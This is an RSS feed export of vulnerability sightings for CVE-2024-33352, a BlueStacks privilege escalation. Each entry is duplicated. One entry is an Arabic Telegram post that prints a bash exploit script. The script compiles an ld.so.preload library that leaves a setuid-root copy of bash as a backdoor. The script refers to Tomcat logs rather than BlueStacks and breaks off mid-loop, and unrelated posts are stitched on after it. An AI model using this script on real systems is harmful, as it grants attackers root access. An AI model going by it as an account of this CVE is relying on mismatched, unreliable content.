https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Sat, 09 May 2026 22:15:48 +0000 https://vulnerability.circl.lu/sighting/3130dfa1-0031-4157-b83f-7bcc8d950305/export {"uuid": "3130dfa1-0031-4157-b83f-7bcc8d950305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "Telegram/SEnCVJxhjOaVAWrOQ1TsM3Vg9broAvFC9FsVM7ZHaSoej6U", "content": "", "creation_timestamp": "2024-08-09T00:41:34.000000Z"} {"uuid": "3130dfa1-0031-4157-b83f-7bcc8d950305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "Telegram/SEnCVJxhjOaVAWrOQ1TsM3Vg9broAvFC9FsVM7ZHaSoej6U", "content": "", "creation_timestamp": "2024-08-09T00:41:34.000000Z"} https://vulnerability.circl.lu/sighting/3130dfa1-0031-4157-b83f-7bcc8d950305/export Fri, 09 Aug 2024 00:41:34 +0000 https://vulnerability.circl.lu/sighting/b650eea5-40c5-48c2-9304-90ffd869cfd2/export {"uuid": "b650eea5-40c5-48c2-9304-90ffd869cfd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/androidMalware/2297", "content": "BlueStacks (Android emulator) privilege escalation through VM backdooring (CVE-2024-33352)\nhttps://github.com/mmiszczyk/CVE-2024-33352", "creation_timestamp": "2024-08-16T08:21:03.000000Z"} {"uuid": "b650eea5-40c5-48c2-9304-90ffd869cfd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/androidMalware/2297", "content": "BlueStacks (Android emulator) privilege escalation through VM backdooring (CVE-2024-33352)\nhttps://github.com/mmiszczyk/CVE-2024-33352", "creation_timestamp": "2024-08-16T08:21:03.000000Z"} https://vulnerability.circl.lu/sighting/b650eea5-40c5-48c2-9304-90ffd869cfd2/export Fri, 16 Aug 2024 08:21:03 +0000 https://vulnerability.circl.lu/sighting/00cb85db-d411-4991-958d-79a07a2f6454/export {"uuid": "00cb85db-d411-4991-958d-79a07a2f6454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3484", "content": "#exploit\n1. CVE-2024-34329:\nPrivilege escalation on Windows through a card printer software\nhttps://p0pcycle.com/2024/07/21/i-hacked-a-card-printer-software\n]-> https://github.com/pamoutaf/CVE-2024-34329\n\n2. CVE-2024-33352:\nBlueStacks privilege escalation through VM backdooring\nhttps://github.com/mmiszczyk/CVE-2024-33352", "creation_timestamp": "2024-08-16T11:18:01.000000Z"} {"uuid": "00cb85db-d411-4991-958d-79a07a2f6454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3484", "content": "#exploit\n1. CVE-2024-34329:\nPrivilege escalation on Windows through a card printer software\nhttps://p0pcycle.com/2024/07/21/i-hacked-a-card-printer-software\n]-> https://github.com/pamoutaf/CVE-2024-34329\n\n2. CVE-2024-33352:\nBlueStacks privilege escalation through VM backdooring\nhttps://github.com/mmiszczyk/CVE-2024-33352", "creation_timestamp": "2024-08-16T11:18:01.000000Z"} https://vulnerability.circl.lu/sighting/00cb85db-d411-4991-958d-79a07a2f6454/export Fri, 16 Aug 2024 11:18:01 +0000 https://vulnerability.circl.lu/sighting/5a39e811-f89e-446b-a310-2af4c400c7ba/export {"uuid": "5a39e811-f89e-446b-a310-2af4c400c7ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "Telegram/8YUzU5Wkwl-5fVrbtRBQ5wa0t-cfwpILGHkMAq4_N2xZa1c", "content": "", "creation_timestamp": "2024-11-26T11:20:19.000000Z"} {"uuid": "5a39e811-f89e-446b-a310-2af4c400c7ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "Telegram/8YUzU5Wkwl-5fVrbtRBQ5wa0t-cfwpILGHkMAq4_N2xZa1c", "content": "", "creation_timestamp": "2024-11-26T11:20:19.000000Z"} https://vulnerability.circl.lu/sighting/5a39e811-f89e-446b-a310-2af4c400c7ba/export Tue, 26 Nov 2024 11:20:19 +0000 https://vulnerability.circl.lu/sighting/38ae3309-c519-4649-abb4-0515d15de5ad/export {"uuid": "38ae3309-c519-4649-abb4-0515d15de5ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1611", "content": "\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 BlueStacks\u060c \u0648\u0647\u0648 \u0645\u062d\u0627\u0643\u064a \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0634\u0627\u0626\u0639 \u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u0627\u0644\u062d\u0648\u0627\u0633\u064a\u0628 \u0627\u0644\u0634\u062e\u0635\u064a\u0629. \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b mmiszczyk \u0648\u062a\u0645 \u0646\u0634\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0639\u0644\u0649 GitHub. \u062a\u062a\u0639\u0644\u0642 \u0627\u0644\u062b\u063a\u0631\u0629 \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0628\u0631 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a (VM) \u0627\u0644\u062e\u0627\u0635 \u0628\u0640 BlueStacks\u060c \u0645\u0645\u0627 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u062c\u0630\u0631 (root) \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629\n\n\u062a\u0639\u062a\u0645\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0639\u0644\u0649 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0645\u064a\u0632\u0627\u062a \u0645\u062d\u062f\u062f\u0629 \u0641\u064a BlueStacks \u0644\u0632\u0631\u0639 \u0628\u0631\u0627\u0645\u062c \u0636\u0627\u0631\u0629 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u060c \u0645\u0645\u0627 \u064a\u0624\u062f\u064a \u0625\u0644\u0649 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a. \u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n\n\u0644\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629\u060c \u064a\u062d\u062a\u0627\u062c \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0635 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644. \u062a\u0645 \u062a\u0648\u0641\u064a\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b\u060c \u0648\u0627\u0644\u0630\u064a \u064a\u0648\u0636\u062d \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0647\u062c\u0648\u0645.\n\n#### \u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0646\u0641\u064a\u0630\n\n1. \u062a\u0646\u0632\u064a\u0644 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0646\u0635: \u064a\u0645\u0643\u0646 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0646\u0635 \u0627\u0644\u062e\u0627\u0635 \u0628\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0645\u0646 [\u0647\u0646\u0627](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh).\n2. \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635: \u064a\u062c\u0628 \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0628\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0645\u0633\u062a\u062e\u062f\u0645 \u0639\u0627\u062f\u064a. \u0627\u0644\u0646\u0635 \u064a\u0642\u0648\u0645 \u0628\u0625\u0639\u062f\u0627\u062f \u0628\u064a\u0626\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0639\u0646 \u0637\u0631\u064a\u0642 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a.\n\n### \u0627\u0644\u0634\u0631\u062d \u0627\u0644\u0641\u0646\u064a \u0644\u0644\u0646\u0635\n\n#!/bin/bash\n# BlueStacks Privilege Escalation Exploit\n# CVE-2024-33352\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0636\u0631\u0648\u0631\u064a\u0629 \u0644\u0632\u0631\u0639 \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\nBACKDOORSH=\"/bin/bash\"\nBACKDOORPATH=\"/tmp/bluestacksrootsh\"\nPRIVESCLIB=\"/tmp/privesclib.so\"\nPRIVESCSRC=\"/tmp/privesclib.c\"\n\nfunction cleanexit {\n # \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u0639\u062f \u0627\u0644\u0627\u0646\u062a\u0647\u0627\u0621\n echo -e \"\\n[+] Cleaning up...\"\n rm -f $PRIVESCSRC\n rm -f $PRIVESCLIB\n rm -f $TOMCATLOG\n touch $TOMCATLOG\n if [ -f /etc/ld.so.preload ]; then\n echo -n > /etc/ld.so.preload 2>/dev/null\n fi\n echo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\n exit $1\n}\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\ncat <<_solibeof_>$PRIVESCSRC\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \nuid_t geteuid(void) {\n static uid_t (*old_geteuid)();\n old_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\n if ( old_geteuid() == 0 ) {\n chown(\"$BACKDOORPATH\", 0, 0);\n chmod(\"$BACKDOORPATH\", 04777);\n unlink(\"/etc/ld.so.preload\");\n }\n return old_geteuid();\n}\n_solibeof_\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\n cleanexit 2;\nfi\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u062e\u0644\u0641\u064a\u0629/\u0627\u0644\u0642\u0634\u0631\u0629 \u0630\u0627\u062a \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u0645\u0646\u062e\u0641\u0636\u0629\ncp $BACKDOORSH $BACKDOORPATH\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\nls -l $BACKDOORPATH\"\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0631\u0627\u0628\u0637 \u0627\u0644\u0631\u0645\u0632\u064a \u0644\u0645\u0644\u0641 ld.so.preload\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\n cleanexit 3\nfi\necho -e \"\\n[+] Symlink created at: \\nls -l $TOMCATLOG\"\n\n# \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 \u062d\u062a\u0649 \u064a\u062a\u0645 \u0625\u0639\u0627\u062f\u0629 \u0641\u062a\u062d \u0627\u0644\u0633\u062c\u0644\u0627\u062a \u0628\u0648\u0627\u0633\u0637\u0629 Tomcat\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\nwhile :; do\n sleep 0.1\n if [ -f /etc/ld.so.preload ]; then\n echo $PRIVESCLIB > /etc/ld.so.preload\n break;\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629\n\n\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0646\u0638\u0627\u0645 \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\u060c \u064a\u064f\u0646\u0635\u062d \u0628\u062a\u062d\u062f\u064a\u062b BlueStacks \u0625\u0644\u0649 \u0622\u062e\u0631 \u0625\u0635\u062f\u0627\u0631 \u0648\u0627\u0644\u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u0637\u0628\u064a\u0642 \u062c\u0645\u064a\u0639 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u062a\u0627\u062d\u0629. \u0643\u0645\u0627 \u064a\u062c\u0628 \u062f\u0627\u0626\u0645\u064b\u0627 \u0627\u0644\u062d\u0631\u0635 \u0639\u0644\u0649 \u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0644\u0646\u0634\u0627\u0637\u0627\u062a \u063a\u064a\u0631 \u0627\u0644\u0627\u0639\u062a\u064a\u0627\u062f\u064a\u0629.\n\n### \u0627\u0644\u0645\u0635\u0627\u062f\u0631\n\n- [mmiszczyk/CVE-2024-33352 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352)\n- [\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh)\n\nALSED404:\n\u0627\u062d\u0630\u0631 \u0645\u0646 \u062d\u0632\u0645\u0629 PyPI \"lr-utils-lib\"\u060c \u0641\u0647\u064a \u062a\u0645\u062b\u0644 \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u062c\u062f\u064a\u062f\u064b\u0627 \u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a macOS!\n\n\u062a\u0633\u0631\u0642 \u0647\u0630\u0647 \u0627\u0644\u062d\u0632\u0645\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f Google Cloud\u060c \u0645\u0645\u0627 \u064a\u0634\u0643\u0644 \u062e\u0637\u0631\u064b\u0627 \u0643\u0628\u064a\u0631\u064b\u0627 \u0639\u0644\u0649 \u0643\u0644 \u0645\u0646 \u0627\u0644\u0645\u0637\u0648\u0631\u064a\u0646 \u0627\u0644\u0623\u0641\u0631\u0627\u062f \u0648\u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a.\n\n\u0627\u0642\u0631\u0623 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2024/07/malicious-pypi-package-targets-macos-to.html\n\nSQL\ud83d\udc7d:\n\u0625\u0644\u064a\u0643 \u0628\u0639\u0636 \u0627\u0644\u0643\u0648\u0631\u0633\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0648\u0625\u0635\u0644\u0627\u062d\u0647\u0627\u060c \u0645\u0639 \u0628\u0639\u0636 \u0627\u0644\u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u0645\u0647\u0645\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062c\u0627\u0644:\n\n### \u062f\u0648\u0631\u0627\u062a \u0628\u0627\u0644\u0644\u063a\u0629 \u0627\u0644\u0639\u0631\u0628\u064a\u0629:\n\n1. \u062f\u0648\u0631\u0629 \u0627\u0644\u0642\u0631\u0635\u0646\u0629 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a\u0629 \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629:\n - \u0645\u0646\u0635\u0629: \u0623\u0643\u0627\u062f\u064a\u0645\u064a\u0629 \u0627\u0644\u0632\u064a\u0631\u0648\n - \u062a\u063a\u0637\u064a \u0627\u0644\u062f\u0648\u0631\u0629 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0623\u0645\u0627\u0646 \u0641\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.elzero.org/courses/ethical-hacking/)", "creation_timestamp": "2024-12-13T19:00:22.000000Z"} {"uuid": "38ae3309-c519-4649-abb4-0515d15de5ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1611", "content": "\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 BlueStacks\u060c \u0648\u0647\u0648 \u0645\u062d\u0627\u0643\u064a \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0634\u0627\u0626\u0639 \u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u0627\u0644\u062d\u0648\u0627\u0633\u064a\u0628 \u0627\u0644\u0634\u062e\u0635\u064a\u0629. \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b mmiszczyk \u0648\u062a\u0645 \u0646\u0634\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0639\u0644\u0649 GitHub. \u062a\u062a\u0639\u0644\u0642 \u0627\u0644\u062b\u063a\u0631\u0629 \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0628\u0631 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a (VM) \u0627\u0644\u062e\u0627\u0635 \u0628\u0640 BlueStacks\u060c \u0645\u0645\u0627 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u062c\u0630\u0631 (root) \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629\n\n\u062a\u0639\u062a\u0645\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0639\u0644\u0649 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0645\u064a\u0632\u0627\u062a \u0645\u062d\u062f\u062f\u0629 \u0641\u064a BlueStacks \u0644\u0632\u0631\u0639 \u0628\u0631\u0627\u0645\u062c \u0636\u0627\u0631\u0629 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u060c \u0645\u0645\u0627 \u064a\u0624\u062f\u064a \u0625\u0644\u0649 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a. \u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n\n\u0644\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629\u060c \u064a\u062d\u062a\u0627\u062c \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0635 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644. \u062a\u0645 \u062a\u0648\u0641\u064a\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b\u060c \u0648\u0627\u0644\u0630\u064a \u064a\u0648\u0636\u062d \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0647\u062c\u0648\u0645.\n\n#### \u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0646\u0641\u064a\u0630\n\n1. \u062a\u0646\u0632\u064a\u0644 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0646\u0635: \u064a\u0645\u0643\u0646 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0646\u0635 \u0627\u0644\u062e\u0627\u0635 \u0628\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0645\u0646 [\u0647\u0646\u0627](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh).\n2. \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635: \u064a\u062c\u0628 \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0628\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0645\u0633\u062a\u062e\u062f\u0645 \u0639\u0627\u062f\u064a. \u0627\u0644\u0646\u0635 \u064a\u0642\u0648\u0645 \u0628\u0625\u0639\u062f\u0627\u062f \u0628\u064a\u0626\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0639\u0646 \u0637\u0631\u064a\u0642 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a.\n\n### \u0627\u0644\u0634\u0631\u062d \u0627\u0644\u0641\u0646\u064a \u0644\u0644\u0646\u0635\n\n#!/bin/bash\n# BlueStacks Privilege Escalation Exploit\n# CVE-2024-33352\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0636\u0631\u0648\u0631\u064a\u0629 \u0644\u0632\u0631\u0639 \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\nBACKDOORSH=\"/bin/bash\"\nBACKDOORPATH=\"/tmp/bluestacksrootsh\"\nPRIVESCLIB=\"/tmp/privesclib.so\"\nPRIVESCSRC=\"/tmp/privesclib.c\"\n\nfunction cleanexit {\n # \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u0639\u062f \u0627\u0644\u0627\u0646\u062a\u0647\u0627\u0621\n echo -e \"\\n[+] Cleaning up...\"\n rm -f $PRIVESCSRC\n rm -f $PRIVESCLIB\n rm -f $TOMCATLOG\n touch $TOMCATLOG\n if [ -f /etc/ld.so.preload ]; then\n echo -n > /etc/ld.so.preload 2>/dev/null\n fi\n echo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\n exit $1\n}\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\ncat <<_solibeof_>$PRIVESCSRC\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \nuid_t geteuid(void) {\n static uid_t (*old_geteuid)();\n old_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\n if ( old_geteuid() == 0 ) {\n chown(\"$BACKDOORPATH\", 0, 0);\n chmod(\"$BACKDOORPATH\", 04777);\n unlink(\"/etc/ld.so.preload\");\n }\n return old_geteuid();\n}\n_solibeof_\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\n cleanexit 2;\nfi\n\n# \u0625\u0639\u062f\u0627\u062f 